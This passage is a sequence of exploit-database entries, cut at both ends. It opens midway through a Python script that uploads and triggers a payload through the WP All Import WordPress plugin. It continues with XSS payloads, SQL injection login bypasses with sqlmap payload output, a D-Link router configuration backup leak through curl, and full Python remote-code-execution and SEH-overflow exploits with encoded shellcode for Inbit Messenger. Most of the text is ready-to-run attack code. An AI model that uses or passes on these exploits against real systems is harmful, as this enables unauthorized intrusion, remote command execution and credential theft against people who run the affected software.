# Do NOT change the following variables wp_login_url = target_url + "/wp-login.php" # WordPress login page wp_all_import_page_settings = target_url + "/wp-admin/admin.php?page=pmxi-admin-settings" # Plugin page settings payload_url = target_url + "/wp-content/uploads/wpallimport/uploads/" + payload_file_name # Payload will be uploaded here re_enable_secure_mode = False session = requests.Session() # This class helps to retrieve plugin settings, including the nonce(s) used to change settings and upload files. class PluginSetting: # Regular Expression patterns pattern_setting_secure_mode = r'<input[a-zA-Z0-9="_\- ]*id="secure"[a-zA-Z0-9="_\-/ ]*>' pattern_wpnonce_edit_settings = r'<input[a-zA-Z0-9="_\- ]*id="_wpnonce_edit\-settings"[a-zA-Z0-9="_\- ]*value="([a-zA-Z0-9]+)"[a-zA-Z0-9="_\-/ ]*>' pattern_wpnonce_upload_file = r'wp_all_import_security[ ]+=[ ]+["\']{1}([a-zA-Z0-9]+)["\']{1};' http_response: requests.Response is_secure_mode_enabled: bool wpnonce_edit_settings: str wpnonce_upload_file: str def __init__(self, http_response: requests.Response): self.http_response = http_response self.check_if_secure_mode_is_enabled() self.retrieve_wpnonce_edit_settings() self.retrieve_wpnonce_upload_file() def check_if_secure_mode_is_enabled(self): # To tell if the Secure Mode is enabled you can check if the checkbox with id "secure" is checked # <input type="checkbox" value="1" id="secure" name="secure" checked="checked"> regex_search = re.search(self.pattern_setting_secure_mode, self.http_response.text) if not regex_search: print("Something went wrong: could not retrieve plugin settings. 
Are you an administrator?") # print_response(self.http_response) # for debugging exit() self.is_secure_mode_enabled = "checked" in regex_search.group() def retrieve_wpnonce_edit_settings(self): # You can find this wpnonce in the source file by searching for the following input hidden: # <input type="hidden" id="_wpnonce_edit-settings" name="_wpnonce_edit-settings" value="052e2438f9"> # 052e2438f9 would be the wpnonce for editing the settings regex_search = re.search(self.pattern_wpnonce_edit_settings, self.http_response.text) if not regex_search: print("Something went wrong: could not retrieve _wpnonce_edit-settings parameter. Are you an administrator?") # print_response(self.http_response) # for debugging exit() self.wpnonce_edit_settings = regex_search.group(1) def retrieve_wpnonce_upload_file(self): # You can find this wpnonce in the source file by searching for the following javascript variable: var wp_all_import_security = 'dee75fdb8b'; # dee75fdb8b would be the wpnonce for the upload regex_search = re.search(self.pattern_wpnonce_upload_file, self.http_response.text) if not regex_search: print("Something went wrong: could not retrieve the upload wpnonce from wp_all_import_security variable") # print_response(self.http_response) # for debugging exit() self.wpnonce_upload_file = regex_search.group(1) def wp_login(): global session data = { "log" : admin_user, "pwd" : admin_pass, "wp-submit" : "Log in", "redirect_to" : wp_all_import_page_settings, "testcookie" : 1 } login_cookie = { "wordpress_test_cookie" : "WP Cookie check" } # allow_redirects is set to False because, when credentials are correct, wordpress replies with 302 found. 
# Looking for this HTTP Response Code makes it easier to tell whether the credentials were correct or not print("Trying to login...") response = session.post(url=wp_login_url, data=data, cookies=login_cookie, allow_redirects=False, verify=verify_ssl_certificate) if response.status_code == 302: print("Logged in successfully!") return # print_response(response) # for debugging print("Login failed. If the credentials are correct, try to print the response to investigate further.") exit() def set_plugin_secure_mode(set_to_enabled:bool, wpnonce:str) -> requests.Response: global session if set_to_enabled: print("Enabling secure mode...") else: print("Disabling secure mode...") print("Edit settings wpnonce value: " + wpnonce) data = { "secure" : (1 if set_to_enabled else 0), "_wpnonce_edit-settings" : wpnonce, "_wp_http_referer" : wp_all_import_page_settings, "is_settings_submitted" : 1 } response = session.post(url=wp_all_import_page_settings, data=data, verify=verify_ssl_certificate) if response.status_code == 403: print("Something went wrong: HTTP Status code is 403 (Forbidden). 
Wrong wpnonce?") # print_response(response) # for debugging exit() return response def switch_back_to_secure_mode(): global session print("Re-enabling secure mode...") response = session.get(url=wp_all_import_page_settings) plugin_setting = PluginSetting(response) if plugin_setting.is_secure_mode_enabled: print("Secure mode is already enabled") return response = set_plugin_secure_mode(set_to_enabled=True,wpnonce=plugin_setting.wpnonce_edit_settings) new_plugin_setting = PluginSetting(response) if not new_plugin_setting.is_secure_mode_enabled: print("Something went wrong: secure mode has not been re-enabled") # print_response(response) # for debugging exit() print("Secure mode has been re-enabled!") def get_wpnonce_upload_file() -> str: global session, re_enable_secure_mode # If Secure Mode is enabled, the exploit tries to disable it, then returns the wpnonce for the upload # If Secure Mode is already disabled, it just returns the wpnonce for the upload print("Checking if secure mode is enabled...") response = session.get(url=wp_all_import_page_settings) plugin_setting = PluginSetting(response) if not plugin_setting.is_secure_mode_enabled: re_enable_secure_mode = False print("Insecure mode is already enabled!") return plugin_setting.wpnonce_upload_file print("Secure mode is enabled. 
The script will disable secure mode for the upload, then it will be re-enabled.") response = set_plugin_secure_mode(set_to_enabled=False, wpnonce=plugin_setting.wpnonce_edit_settings) new_plugin_setting = PluginSetting(response) if new_plugin_setting.is_secure_mode_enabled: print("Something went wrong: secure mode has not been disabled") # print_response(response) # for debugging exit() print("Secure mode has been disabled!") re_enable_secure_mode = True return new_plugin_setting.wpnonce_upload_file def upload_file(wpnonce_upload_file: str): global session print("Uploading file...") print("Upload wpnonce value: " + wpnonce_upload_file) zip_file_name = os.path.basename(zip_file_to_upload) upload_url = wp_all_import_page_settings + "&action=upload&_wpnonce=" + wpnonce_upload_file files = { "async-upload" : (zip_file_name, open(zip_file_to_upload, 'rb'))} data = { "name" : zip_file_name } response = session.post(url=upload_url, files=files, data=data) if response.status_code == 200: print("Server replied with HTTP 200 OK. The upload should be completed.") print("Payload should be here: " + payload_url) print("If you can't find the payload at this URL, try to print the response to investigate further") # print_response(response) # for debugging return 1 else: print("Something went wrong during the upload. Try to print the response to investigate further") # print_response(response) # for debugging return 0 def activate_payload(): global session print("Activating payload...") response = session.get(url=payload_url) if response.status_code != 200: print("Something went wrong: could not find payload at " + payload_url) # print_response(response) # for debugging return def print_response(response:requests.Response): print(response.status_code) print(response.text) # Entry Point def Main(): print("Target: " + target_url) print("Credentials: " + admin_user + ":" + admin_pass) # Do the login wp_login() # Retrieve wpnonce for upload. 
# It disables Secure Mode if needed, then returns the wpnonce wpnonce_upload_file = get_wpnonce_upload_file() # Upload the file file_uploaded = upload_file(wpnonce_upload_file) # Re-enable Secure Mode if needed if re_enable_secure_mode: switch_back_to_secure_mode() # Activate the payload if file_uploaded: activate_payload() Main()
  15. ## Title: rukovoditel 3.2.1 - Cross-Site Scripting (XSS) ## Author: nu11secur1ty ## Date: 11.03.2022 ## Vendor: https://www.rukovoditel.net/ ## Software: https://sourceforge.net/projects/rukovoditel/files/rukovoditel_3.2.1.zip/download ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1 ## Description: The application is vulnerable to DOM-based cross-site scripting attacks. Data is read from `location.hash` and passed to `jQuery.parseHTML`. The attacker can use this vulnerability to create an unlimited number of accounts on this system until it crashed. ## STATUS: HIGH Vulnerability - CRITICAL [+] Payload: ```POST GET /rukovoditel/index.php?module=users/restore_password HTTP/1.1 Host: pwnedhost.com Accept-Encoding: gzip, deflate Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: sid=jf2mf72r2kfakhhnn6evgusrcg; cookie_test=please_accept_for_session; app_login_redirect_to=module%3Ddashboard%2F Upgrade-Insecure-Requests: 1 Referer: http://pwnedhost.com/rukovoditel/index.php?module=users/login Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/rukovoditel.net/2022/rukovoditel-3.2.1) ## Proof and Exploit: [href](https://streamable.com/i1qmfk) ## Time spent `3:45` System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ 
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>
  16. # Exploit Title: Book Store Management System 1.0.0 - Stored Cross-Site Scripting (XSS) # Date: 2022-11-08 # Exploit Author: Rajeshwar Singh # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bsms_ci.zip # Tested on: Windows/XAMPP ########################################################################### Payload use = "><script>alert("XSS")</script> 1. Visit URL http://localhost/bsms_ci/ 2. login with admin Credentials 3. navigate to user Management 4. Click on "Add New System User" 5. Add payload in "Name" input field 6. Click save. 7. Visit http://localhost/bsms_ci/index.php/user 8. XSS payload execute.
  17. # Exploit Title: Human Resource Management System - SQL Injection (unauthenticated) # Date: 08-11-2022 # Exploit Author: Matthijs van der Vaart (eMVee) # Vendor Homepage: https://www.sourcecodester.com/php/15740/human-resource-management-system-project-php-and-mysql-free-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/hrm.zip # Version: 1.0 (Monday, October 10, 2022 - 13:37) # Tested On: Windows 10 Pro 10.0.19044 N/A Build 1288 + XAMPP V3.3.0 1) Capture the login POST request with Burp Suite or OWASP ZAP 2) Save the request as "login.req" 3) Run sqlmap as follows: "sqlmap -r login.req" Example login.req ========== POST /controller/login.php HTTP/1.1 Host: target Cookie: csrf_token_f58f5b43e3803b8c3c224afd706cf0f9927d9fd3c222740171d746d078b1ac9b=h1qG45IggxzwQ/i1lH2zBF7ktvDJT716RNl59LQTkwk=; PHPSESSID=kg0h3kpsbf2r3mnmbmmap2afda User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 66 Origin: https://target Referer: https://target/index.php<https://10.0.2.15/dashboard/hrm/index.php> Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers Connection: close name=admin%40gmail.com&password=password+&submit=Sign+In ========= Output example SQL Injection unauthenticated login page ========== POST parameter 'password' is vulnerable. Do you want to keep testing the others (if any)? 
[y/N] n sqlmap identified the following injection point(s) with a total of 1143 HTTP(s) requests: --- Parameter: password (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: [email protected]&password=password ' RLIKE (SELECT (CASE WHEN (7213=7213) THEN 0x70617373776f726420 ELSE 0x28 END))-- ylOf&submit=Sign In Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: [email protected]&password=password ' OR (SELECT 8513 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(8513=8513,1))),0x716a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- RBnO&submit=Sign In Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: [email protected]&password=password ' AND (SELECT 4404 FROM (SELECT(SLEEP(5)))eQTb)-- NTCP&submit=Sign In Parameter: name (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: [email protected]' RLIKE (SELECT (CASE WHEN (2620=2620) THEN 0x61646d696e40676d61696c2e636f6d ELSE 0x28 END))-- KlrV&password=password &submit=Sign In Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: [email protected]' AND (SELECT 7287 FROM(SELECT COUNT(*),CONCAT(0x7176787871,(SELECT (ELT(7287=7287,1))),0x716a7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- fSRz&password=password &submit=Sign In Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: [email protected]' AND (SELECT 8912 FROM (SELECT(SLEEP(5)))NCtJ)-- ennA&password=password &submit=Sign In --- there were multiple injection points, please select the one to use for following injections: [0] place: POST, parameter: name, type: Single quoted string (default) [1] place: POST, parameter: password, type: Single quoted string ==========
  18. # Exploit Title: Inbit Messenger v4.9.0 - Unauthenticated Remote SEH Overflow # Date: 11/08/2022 # Exploit Author: a-rey # Vendor Homepage: http://www.inbit.com/support.html # Software Link: http://www.softsea.com/review/Inbit-Messenger-Basic-Edition.html # Version: v4.6.0 - v4.9.0 # Tested on: Windows XP SP3, Windows 7, Windows 10 # Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Inbit_Messenger/v4.6.0/writeup.md #!/usr/bin/env python3 # -*- coding: utf-8 -*- import sys, socket, struct, argparse, logging """ /opt/metasploit-framework/bin/msfvenom \ -p windows/messagebox \ ICON=WARNING \ TEXT="get wrecked" \ TITLE="LOLZ" \ EXITFUNC=thread \ -f py \ -v SHELLCODE \ -e x86/shikata_ga_nai \ -b '\x3E' """ SHELLCODE = b"" SHELLCODE += b"\xba\xbd\x3d\x03\xfa\xd9\xc9\xd9\x74\x24\xf4" SHELLCODE += b"\x5b\x31\xc9\xb1\x41\x31\x53\x14\x03\x53\x14" SHELLCODE += b"\x83\xc3\x04\x5f\xc8\xda\x11\x04\xea\xa9\xc1" SHELLCODE += b"\xce\x3c\x80\xb8\x59\x0e\xed\xd9\x2e\x01\xdd" SHELLCODE += b"\xaa\x46\xee\x96\xdb\xba\x65\xee\x2b\x49\x07" SHELLCODE += b"\xcf\xa0\x7b\xc0\x40\xaf\xf6\xc3\x06\xce\x29" SHELLCODE += b"\xdc\x58\xb0\x42\x4f\xbf\x15\xdf\xd5\x83\xde" SHELLCODE += b"\x8b\xfd\x83\xe1\xd9\x75\x39\xfa\x96\xd0\x9e" SHELLCODE += b"\xfb\x43\x07\xea\xb2\x18\xfc\x98\x44\xf0\xcc" SHELLCODE += b"\x61\x77\xcc\xd3\x32\xfc\x0c\x5f\x4c\x3c\x43" SHELLCODE += b"\xad\x53\x79\xb0\x5a\x68\xf9\x62\x8b\xfa\xe0" SHELLCODE += b"\xe1\x91\x20\xe2\x1e\x43\xa2\xe8\xab\x07\xee" SHELLCODE += b"\xec\x2a\xf3\x84\x09\xa7\x02\x73\x98\xf3\x20" SHELLCODE += b"\x9f\xfa\x38\x9a\x97\xd5\x6a\x52\x42\xac\x50" SHELLCODE += b"\x0d\x03\xe1\x5a\x22\x49\x16\xfd\x45\x91\x19" SHELLCODE += b"\x88\xff\x6a\x5d\x65\x31\x92\xc1\xfe\xd2\x77" SHELLCODE += b"\x50\xe8\x65\x88\xab\x17\xf0\x32\x5c\x8f\x6f" SHELLCODE += b"\xd1\x7c\x0e\x18\x1a\x4f\xbe\xbc\x34\xda\xcd" SHELLCODE += b"\x59\xb7\x14\xea\x2a\x6b\x71\x06\xa2\x72\x2f" SHELLCODE += b"\xe9\xe1\x7e\x59\xd7\x5a\xc4\xf1\x75\x17\x86" SHELLCODE += 
b"\x85\x65\x8c\xa4\x61\xca\x33\xb7\x8d\x9c\x93" SHELLCODE += b"\x68\x52\x7c\x4c\x25\xdd\x30\xd6\x84\x3a\x40" SHELLCODE += b"\xba\xc2\xb8\xd9\xa0\x63\xaa\xbc\x42\x2c\x44" SHELLCODE += b"\x49\xf9\xa9\xf7\xdd\x9a\x54\x8c\x3d\x54\x5e" SHELLCODE += b"\xe4\x71\xb2\x6b\x7c\x68\x8b\xb9\x14\x5a\xbf" SHELLCODE += b"\x6c\xbb\x65\xef\xbe\xfb\xc9\xef\x94\xf3" BANNER = """\033[0m\033[1;35m ╔═════════════════════════════════════════════════════════════════════╗ ║\033[0m Inbit Messenger v4.6.0 - v4.9.0 Unauthenticated Remote SEH Overflow \033[1;35m║ ╚═════════════════════════════════════════════════════════════════════╝\033[0m by: \033[1;36m █████╗ ██████╗ ███████╗██╗ ██╗ \033[1;36m██╔══██╗ ██╔══██╗██╔════╝██║ ██║ \033[1;36m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝ \033[1;36m██╔══██║ ██╔══██╗██╔══╝ ██╔╝ \033[1;36m██║ ██║ ██║ ██║███████╗ ██║ \033[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ \033[0m""" BAD_BYTES = b"\x3e" # > PAYLOAD_LENGTH = 2000 nSEH = b"\xEB\x06\x90\x90" # JMP SHORT 0x8; NOP; NOP SEH = struct.pack("<I", 0x263ae1bd) # ipworks6.dll | POP EBP; POP EBX; RET # NOTE: sets the TEB's ACTIVATION_CONTEXT_STACK.ActiveFrame = NULL NULL_ACT_CTX_STUB = b"\x31\xC0\xBB\x00\x10" NULL_ACT_CTX_STUB += b"\x00\x00\x64\x8B\x48" NULL_ACT_CTX_STUB += b"\x18\x39\x99\xA8\x01" NULL_ACT_CTX_STUB += b"\x00\x00\x7C\x0A\x8B" NULL_ACT_CTX_STUB += b"\x99\xA8\x01\x00\x00" NULL_ACT_CTX_STUB += b"\x89\x03\xEB\x06\x89" NULL_ACT_CTX_STUB += b"\x81\xB0\x01\x00\x00" def exploit(targetIp:str, targetPort:int) -> None: pkt = b"<" pkt += (b"A" * 40) pkt += nSEH pkt += SEH pkt += NULL_ACT_CTX_STUB pkt += (b"\x90" * 32) # NOP sled for shikata_ga_nai decoder pkt += SHELLCODE # NOTE: need to send 1600+ bytes to overwrite beyond top of thread's stack pkt += (b"B" * (PAYLOAD_LENGTH - len(pkt))) # NOTE: check for bad bytes for c in pkt: if c in BAD_BYTES: logging.error(f"found bad byte 0x{c:02x} in payload") sys.exit(-1) logging.info(f"sending {len(pkt)} byte payload to {targetIp}:{targetPort} ...") s = 
socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((targetIp, targetPort)) s.send(pkt) s.close() logging.success("DONE") if __name__ == '__main__': # parse arguments parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER) parser.add_argument('-t', '--target', help='target IP', type=str, required=True) parser.add_argument('-p', '--port', help='target port', type=int, required=False, default=10883) args = parser.parse_args() # define logger logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO') logging.SUCCESS = logging.CRITICAL + 1 logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m') logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m') logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m') logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m') logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args) # print banner print(BANNER) # run exploit exploit(args.target, args.port)
  19. # Exploit Title: Inbit Messenger v4.9.0 - Unauthenticated Remote Command Execution (RCE) # Date: 11/08/2022 # Exploit Author: a-rey # Vendor Homepage: http://www.inbit.com/support.html # Software Link: http://www.softsea.com/review/Inbit-Messenger-Basic-Edition.html # Version: v4.6.0 - v4.9.0 # Tested on: Windows XP SP3, Windows 7, Windows 10, Windows Server 2019 # Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Inbit_Messenger/v4.6.0/writeup.md #!/usr/bin/env python3 # -*- coding: utf-8 -*- import sys, socket, struct, string, argparse, logging BANNER = """\033[0m\033[1;35m ╔══════════════════════════════════════════════════════════════════════════╗ ║\033[0m Inbit Messenger v4.6.0 - v4.9.0 Unauthenticated Remote Command Execution \033[1;35m║ ╚══════════════════════════════════════════════════════════════════════════╝\033[0m by: \033[1;36m █████╗ ██████╗ ███████╗██╗ ██╗ \033[1;36m██╔══██╗ ██╔══██╗██╔════╝██║ ██║ \033[1;36m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝ \033[1;36m██╔══██║ ██╔══██╗██╔══╝ ██╔╝ \033[1;36m██║ ██║ ██║ ██║███████╗ ██║ \033[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ \033[0m""" # NOTE: IAT addresses for KERNEL32!WinExec in IMS.EXE by build number TARGETS = { 4601 : 0x005f3360, 4801 : 0x005f7364, 4901 : 0x005f7364, } # NOTE: min and max values for length of command CMD_MIN_LEN = 10 CMD_MAX_LEN = 0xfc64 # NOTE: these bytes cannot be in the calculated address of WinExec to ensure overflow BAD_BYTES = b"\x3e" # > def getWinExecAddress(targetIp:str, targetPort:int) -> bytes: # NOTE: send packet with client build number of 4601 for v4.6.0 pkt = b"<50><0><IM><ID>7</ID><a>1</a><b>4601</b><c>1</c></IM>\x00" logging.info(f"trying to get version information from {targetIp}:{targetPort} ...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((targetIp, targetPort)) s.send(pkt) _d = s.recv(1024) # find build tag in response if b'<c>' not in _d: logging.error(f"invalid version packet received: {_d}") sys.exit(-1) s.close() try: build 
= int(_d[_d.index(b'<c>') + 3:_d.index(b'</c>')]) except: logging.error(f"failed to parse build number from packet: {_d}") sys.exit(-1) # get the IAT offset if build not in TARGETS.keys(): logging.error(f"unexpected build number: {build}") sys.exit(-1) # NOTE: we need to subtract 0x38 since the vulnerable instruction is 'CALL [EAX + 0x38]' winexec = struct.pack("<I", TARGETS[build] - 0x38) logging.success(f"target build number is {build}") logging.info(f"WinExec @ 0x{TARGETS[build] - 0x38:08x}") # sanity check for bad bytes in WinExec address for c in winexec: if c in BAD_BYTES: logging.error(f"found bad byte in WinExec address: 0x{TARGETS[build] - 0x38:08x}") sys.exit(-1) return winexec def exploit(targetIp:str, targetPort:int, command:bytes) -> None: # NOTE: command must be NULL terminated command += b"\x00" # check user command length if len(command) < CMD_MIN_LEN: logging.error(f"command length must be at least {CMD_MIN_LEN} characters") sys.exit(-1) if len(command) >= CMD_MAX_LEN: logging.error(f"command length must be less than {CMD_MAX_LEN} characters") sys.exit(-1) # get WinExec address winexec = getWinExecAddress(targetIp, targetPort) # get a string representation of the length of the command data after the <> tag parsed by atol() pktLen = str(len(command)) pkt = b"<" # start of XML tag/stack overflow pkt += pktLen.encode() # number parsed by atol() & length of command data following '>' character pkt += b"\x00" # NULL terminator to force atol to ignore what comes next # NOTE: adjust the 85 byte offset calculated that assumes a 2 byte string passed to atol() pkt += (b"A" * (85 - (len(pktLen) - 2))) # padding up to function pointer overwrite pkt += winexec # indirect function pointer we control pkt += b">" # end of XML tag/stack overflow pkt += command # the command set to the call to WinExec() logging.info(f"sending payload to {targetIp}:{targetPort} ...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((targetIp, targetPort)) s.send(pkt) 
s.close() logging.success("DONE") if __name__ == '__main__': # parse arguments parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER) parser.add_argument('-t', '--target', help='target IP', type=str, required=True) parser.add_argument('-c', '--command', help='command to run', type=str, required=True) parser.add_argument('-p', '--port', help='target port', type=int, required=False, default=10883) args = parser.parse_args() # define logger logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO') logging.SUCCESS = logging.CRITICAL + 1 logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m') logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m') logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m') logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m') logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args) # print banner print(BANNER) # run exploit exploit(args.target, args.port, args.command.encode())
  20. # Exploit Title: Outline V1.6.0 - Unquoted Service Path # Exploit Author: Milad Karimi (Ex3ptionaL) # Discovery Date: 2022-11-10 # Vendor Homepage: https://getoutline.org/ # Software Link: https://getoutline.org/ # Tested Version: V1.6.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Microsoft Windows 11 Enterprise # Step to discover Unquoted Service Path: C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ Outline Updater OutlineServiceSvc C:\Program Files (x86)\Outline\OutlineService.exe Auto C:\>sc qc OutlineService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: OutlineService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Outline\OutlineService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : OutlineService DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\>systeminfo OS Name: Microsoft Windows 11 Enterprise OS Version: 10.0.22000 N/A Build 22000 OS Manufacturer: Microsoft Corporation
  21. # Exploit Title: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure # Date: 2022-11-10 # Exploit Author: Aryan Chehreghani # Vendor Homepage: https://www.dlink.com # Software Link: https://dlinkmea.com/index.php/product/details?det=dU1iNFc4cWRsdUpjWEpETFlSeFlZdz09 # Firmware Version: ME_1.00 # Tested on: Windows 11 # [ Details - DSL-124 ]: #The DSL-124 Wireless N300 ADSL2+ Modem Router is a versatile, high-performance router for a home or small office, #With integrated ADSL2/2+, supporting download speeds up to 24 Mbps, firewall protection, #Quality of Service (QoS),802.11n wireless LAN, and four Ethernet switch ports, #the Wireless N300 ADSL2+ Modem Router provides all the functions that a user needs to establish a secure and high-speed link to the Internet. # [ Description ]: #After the administrator enters and a new session is created, the attacker sends a request using the post method in her system, #and in response to sending this request, she receives a complete backup of the router settings, #In fact this happens because of the lack of management of users and sessions in the network. # [ POC ]: Request : curl -d "submit.htm?saveconf.htm=Back+Settings" -X POST http://192.168.1.1/form2saveConf.cgi Response : HTTP/1.1 200 OK Connection: close Server: Virtual Web 0.9 Content-Type: application/octet-stream; Content-Disposition: attachment;filename="config.img" Pragma: no-cache Cache-Control: no-cache <Config_Information_File_8671> <V N="WLAN_WPA_PSK" V="pass@12345"/> <V N="WLAN_WPA_PSK_FORMAT" V="0x0"/> <V N="WLAN_WPA_REKEY_TIME" V=""/> <V N="WLAN_ENABLE_1X" V="0x0"/> <V N="WLAN_ENABLE_MAC_AUTH" V="0x0"/> <V N="WLAN_RS_IP" V="0.0.0.0"/> . . . </Config_Information_File_8671>
  22. # Exploit Title: Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS) # Author: Bleron Rrustemi # Discovery Date: 2022-11-15 # Vendor Homepage: https://www.uniview.com/tr/Products/NVR/Easy/NVR301-04S2-P4/ # Datasheet:: https://www.uniview.com/download.do?id=1761643 # Device Firmware: NVR-B3801.20.15.200829 # Tested Version: NVR301-04S2-P4 # Tested on: Windows 10 Enterprise LTSC 64\Firefox 106.0.5 (64-bit) # Vulnerability Type: Reflected Cross-Site Scripting (XSS) # CVE: N/A # Proof of Concept: IP=IP of the device http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('1')</script> Best regards, Bleron Rrustemi Chief Technology Officer Direct: +383 (0) 49 955 503 E-mail: <mailto:[email protected]> [email protected] <http://> Drugëza SHPK Rr. Lekë Dukagjini p.n Prishtinë, 10000 • Kosovo Tel.: +383 49 955 503 www.drugeza.com ü Be GREEN, keep it on the SCREEN
  23. # Exploit Title: Helmet Store Showroom v1.0 - SQL Injection
# Exploit Author: Ameer Hamza
# Date: November 15, 2022
# Vendor Homepage: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=15851&title=Helmet+Store+Showroom+Site+in+PHP+and+MySQL+Free+Source+Code
# Tested on: Kali Linux, Apache, Mysql
# Vendor: oretnom23
# Version: v1.0

# Exploit Description:
# Helmet Store Showroom v1.0 suffers from SQL injection on the login page, which leads to an authentication bypass of the admin account.

[+] The username parameter of the login page is vulnerable to SQLi (the form posts to /hss/classes/Login.php?f=login, as shown in the request below)
[+] URL --> http://localhost/hss/admin/login.php
[+] Username = ' OR 1=1-- -

HTTP REQUEST

POST /hss/classes/Login.php?f=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 38
Origin: http://localhost
Connection: close
Referer: http://localhost/hss/admin/login.php
Cookie: PHPSESSID=08o3sl7jk4l442gq19s1t3hvpa

username='+OR+1%3D1+--+-&password=1234
  # Exploit Title: Revenue Collection System v1.0 - Remote Code Execution (RCE)
# Exploit Author: Joe Pollock
# Date: November 16, 2022
# Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/rates.zip
# Tested on: Kali Linux, Apache, Mysql
# Vendor: Kapiya
# Version: 1.0
# Exploit Description:
# Revenue Collection System v1.0 suffers from an unauthenticated SQL Injection Vulnerability, in step1.php, allowing remote attackers to
